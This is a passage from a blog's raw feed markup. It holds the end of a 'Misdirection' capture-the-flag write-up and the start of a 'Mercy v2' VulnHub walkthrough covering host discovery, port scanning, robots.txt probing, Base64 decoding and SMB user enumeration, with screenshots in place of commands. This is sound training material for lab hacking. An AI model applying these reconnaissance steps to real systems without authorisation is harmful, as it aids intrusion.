/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;6 - CAPTURING THE 2nd FLAG&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;root.txt&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_u2OhT6UX1AsBMCN9Be6og6WMp9h6r5VgVHnR6LMxHYqwokDkUkyzwkfnByhYNTMlNITq0yTcq0CwsGdfVbCHUTyJxyd-e_DaPCPGNXMhV1gYfLmttDG8u5x0PkXI9gA-48zzFdcmRmoN/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;72&quot; data-original-width=&quot;375&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_u2OhT6UX1AsBMCN9Be6og6WMp9h6r5VgVHnR6LMxHYqwokDkUkyzwkfnByhYNTMlNITq0yTcq0CwsGdfVbCHUTyJxyd-e_DaPCPGNXMhV1gYfLmttDG8u5x0PkXI9gA-48zzFdcmRmoN/s16000/screenshot.32.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/6168209329600246029'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/6168209329600246029'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2022/01/misdirection.html' title='Misdirection'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGZCOYzSZwGQ4YD-tvLhQy04LTTSlWq5sAVr5O6vp9t8cC37T53CZMYfrjZ3sRt_JRi6cKklJbsNvWwf3pE5TCCz9GHyXny43LF01a8l2rS46jSq5PKMTaBEl4hVYlbV1tGoapwu_6PGZk/s72-c/screenshot.35.jpg" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-5616665917280090043</id><published>2022-01-06T11:38:00.000-06:00</published><updated>2022-01-06T11:38:30.903-06:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>Mercy v2</title><content type='html'>&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;MERCY v2&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhX4hVrx0fZRLYGqY3v96DkPyIyZiUYaMwu0wDMUnAhTh9PFG8uuc5bLRRxhmI7mZnUWe7OxQDByaPdmdCPPf7ibZpPcSEgwx-KgyEmN2qD9qFLWg2K1XsvnOChHgzWedaoQm4DXZhrbT1/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;239&quot; data-original-width=&quot;677&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhX4hVrx0fZRLYGqY3v96DkPyIyZiUYaMwu0wDMUnAhTh9PFG8uuc5bLRRxhmI7mZnUWe7OxQDByaPdmdCPPf7ibZpPcSEgwx-KgyEmN2qD9qFLWg2K1XsvnOChHgzWedaoQm4DXZhrbT1/s16000/screenshot.53.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;b style=&quot;color: #6fa8dc;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;color: #6fa8dc;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;1 - INTRODUCTION&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;- The goal of this exercise is to develop a hacking process for the vulnerable machine&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;background-color: white;&quot;&gt;Mercy v2,&amp;nbsp;&lt;/b&gt;&lt;span style=&quot;background-color: white;&quot;&gt;from the VulnHub pentesting platform.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style=&quot;background-color: white;&quot;&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;-&amp;nbsp;&lt;b&gt;Mercy v2&lt;/b&gt;&amp;nbsp;can be downloaded from here:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;&lt;p style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: #1177cc; font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/&quot;&gt;https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Once downloaded &lt;b&gt;Mercy v2&lt;/b&gt;&amp;nbsp;and extracted with VirtualBox:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1hh8JyuK-bLGXKshLdrBWQF6WBmh8_geSqhoUSRWBe2vEog1Bea0zWx7TeX8YS5HMHSW3DOezV6nK1XA7awAs8CcuQbFVxrfG_CqvXfezjEk34qsrn8hNeTktajRzyCATbvj2LKXO8IoQ/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;121&quot; data-original-width=&quot;239&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1hh8JyuK-bLGXKshLdrBWQF6WBmh8_geSqhoUSRWBe2vEog1Bea0zWx7TeX8YS5HMHSW3DOezV6nK1XA7awAs8CcuQbFVxrfG_CqvXfezjEk34qsrn8hNeTktajRzyCATbvj2LKXO8IoQ/s16000/screenshot.1.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;color: #6fa8dc;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;2 - ENUMERATION&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;- netdiscover helps to identify&amp;nbsp;&lt;b&gt;Mervy v2&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&#39;s IP 192.168.1.25:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji6c1GFxHkWQq2P0PmGmkTT2jL5BxrpnA5yhqTujjKhxmBWaB06TupwCz0YB-PxLWNBfNcnQE23VSr4SajLlu1ue1bcJn3cF9iixdwCC1i3jEkxKr415Dm9VbSa7N4V7JWY0LQWMJKX_mp/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;48&quot; data-original-width=&quot;425&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji6c1GFxHkWQq2P0PmGmkTT2jL5BxrpnA5yhqTujjKhxmBWaB06TupwCz0YB-PxLWNBfNcnQE23VSr4SajLlu1ue1bcJn3cF9iixdwCC1i3jEkxKr415Dm9VbSa7N4V7JWY0LQWMJKX_mp/s16000/screenshot.3.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs-y4V5nh-0nPW3joWGYQW6y1xqBiTbnVikqiUDUvyxokAXulHUZsDS-RzXSPG5RdtIAj0tUD07UYTeMM2bWgC4E06TYcdzsvz_51P30G0-is7qX06pXkkpaBEmy_E0VFYjZvfVfEkV2bN/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;265&quot; data-original-width=&quot;833&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs-y4V5nh-0nPW3joWGYQW6y1xqBiTbnVikqiUDUvyxokAXulHUZsDS-RzXSPG5RdtIAj0tUD07UYTeMM2bWgC4E06TYcdzsvz_51P30G0-is7qX06pXkkpaBEmy_E0VFYjZvfVfEkV2bN/s16000/screenshot.2.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- Scanning with Nmap:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXeqRZBhVyy75t8vGKx0lC1XIBH0yb4asJGuB4pbPktRemlcbamDYbVsdiukI66ISyLO2HRbkGuJbOLNHyFpYZrKvdZSsIWXl7q2z4nVPAzgLWgXVBBy7Okt5mQHtIh4LfWtnqFT4lUd00/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;357&quot; data-original-width=&quot;439&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXeqRZBhVyy75t8vGKx0lC1XIBH0yb4asJGuB4pbPktRemlcbamDYbVsdiukI66ISyLO2HRbkGuJbOLNHyFpYZrKvdZSsIWXl7q2z4nVPAzgLWgXVBBy7Okt5mQHtIh4LfWtnqFT4lUd00/s16000/screenshot.4.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning deeper port 8080 we notice the existence of &lt;b&gt;robots.txt&lt;/b&gt; and&amp;nbsp;&lt;b&gt;/tryharder/tryharder&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOBLaJvv6aV85ZbuzFHOgLduRtc1LMG0vSTa2LxeOE53he_8MbVQVCCGuwa3FVdxTEDXq8mtZ3xCj8Pnxv4FKSLGRHEwM3kxLxgf3Wz4qHKK6GN_Gmxt54gPmJZDhpynzIBlueZbrTXuUM/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;362&quot; data-original-width=&quot;705&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOBLaJvv6aV85ZbuzFHOgLduRtc1LMG0vSTa2LxeOE53he_8MbVQVCCGuwa3FVdxTEDXq8mtZ3xCj8Pnxv4FKSLGRHEwM3kxLxgf3Wz4qHKK6GN_Gmxt54gPmJZDhpynzIBlueZbrTXuUM/s16000/screenshot.5.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- Going to &lt;b&gt;robots.txt&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhOizqDg7d2L4sDptkCcC_4gP_q0oo6Oveqfr7i6G4vBR9QcdTlaYC6mIh1skeR8ycKec5DYBdrjzTgx6YRlzxsDdAWdIqfBZlgc2eZJ48Aa87qC3GBFoKC1jGNu30zTSBwohBnshFJ6VO/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;191&quot; data-original-width=&quot;429&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhOizqDg7d2L4sDptkCcC_4gP_q0oo6Oveqfr7i6G4vBR9QcdTlaYC6mIh1skeR8ycKec5DYBdrjzTgx6YRlzxsDdAWdIqfBZlgc2eZJ48Aa87qC3GBFoKC1jGNu30zTSBwohBnshFJ6VO/s16000/screenshot.6.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Going to &lt;b&gt;/tryharder/tryharder&lt;/b&gt; we find a Base64 encoded text:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOZKNn4z7wadRL3ked1FQb5xwgnPbIQ3E2Dc384ggiwaNGibN9d8uV32GeudGeLBxeukXxaKP2wUMH8c9c6ge2OLvh9Ts5NcZG6r2yDI5DaSzPyTDDjnky3K7b72DResZELKvYWmUP6Wx5/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;323&quot; data-original-width=&quot;805&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOZKNn4z7wadRL3ked1FQb5xwgnPbIQ3E2Dc384ggiwaNGibN9d8uV32GeudGeLBxeukXxaKP2wUMH8c9c6ge2OLvh9Ts5NcZG6r2yDI5DaSzPyTDDjnky3K7b72DResZELKvYWmUP6Wx5/s16000/screenshot.7.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- Decoding from Base64:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEXtk1kxxnCwc9SHK2LuE4k_oloP9-zR8Kh3eOUYRg_70MLcmTuEbwtRdQQ543KwlDWPBiZ80DaV2AG2zoSb4eE8Ij4ZfVZjqdTgHJqiPzIIJoRevgpoAQ8kXbW3m_cPr01cWHfuflbjOA/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;614&quot; data-original-width=&quot;632&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEXtk1kxxnCwc9SHK2LuE4k_oloP9-zR8Kh3eOUYRg_70MLcmTuEbwtRdQQ543KwlDWPBiZ80DaV2AG2zoSb4eE8Ij4ZfVZjqdTgHJqiPzIIJoRevgpoAQ8kXbW3m_cPr01cWHfuflbjOA/s16000/screenshot.8.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Let&#39;s enumerate the SMB server running at port 445:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;clear: left; float: left; font-family: arial; font-size: medium; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;210&quot; data-original-width=&quot;855&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5j_6gwXTrSVadKT876CU9htH13sIs-LbRMME95L-1LpMLSl3X3-gHgMEZGcCPW3lV4Zc6b19BDOTYqenRzoFYFHuuGwyi_KlhCrHxQ0kAHBaah03QXt7fNB6NXDIxI4w_yW1kqYzWzGnm/s16000/screenshot.9.jpg&quot; /&gt;&lt;/span&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_RWsz42s9jgqZst5jmgvYBqo8uwOr99ZAVqcjeqZTGusXvzaudjzL3gt_hBaz-KOIChQqFtCflfF4nuBgY4zbShByEW12T5xMe9gb-CfYMeurFl5DK-vdwgVjvdG9Fjqc-PVtqtAa5_N5/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;44&quot; data-original-width=&quot;354&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_RWsz42s9jgqZst5jmgvYBqo8uwOr99ZAVqcjeqZTGusXvzaudjzL3gt_hBaz-KOIChQqFtCflfF4nuBgY4zbShByEW12T5xMe9gb-CfYMeurFl5DK-vdwgVjvdG9Fjqc-PVtqtAa5_N5/s16000/screenshot.10.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3BnH1fTsazax7QX22qMsMtU2kdAYVIsuWu852tF8SSW89LidBm_xDhj38hV90COcpI3iqA5DfXKEG84cowaEZ0MpzqzCQDk3VGaYDMy7PJD8z9B99DFPdYlVppW3fMjijG6em-KivWQfY/&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;clear: left; display: inline !important; font-family: arial; font-size: medium; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;263&quot; data-original-width=&quot;857&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3BnH1fTsazax7QX22qMsMtU2kdAYVIsuWu852tF8SSW89LidBm_xDhj38hV90COcpI3iqA5DfXKEG84cowaEZ0MpzqzCQDk3VGaYDMy7PJD8z9B99DFPdYlVppW3fMjijG6em-KivWQfY/s16000/screenshot.11.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- So we have found 4 users.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Remembering the text decoded with Base64:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a 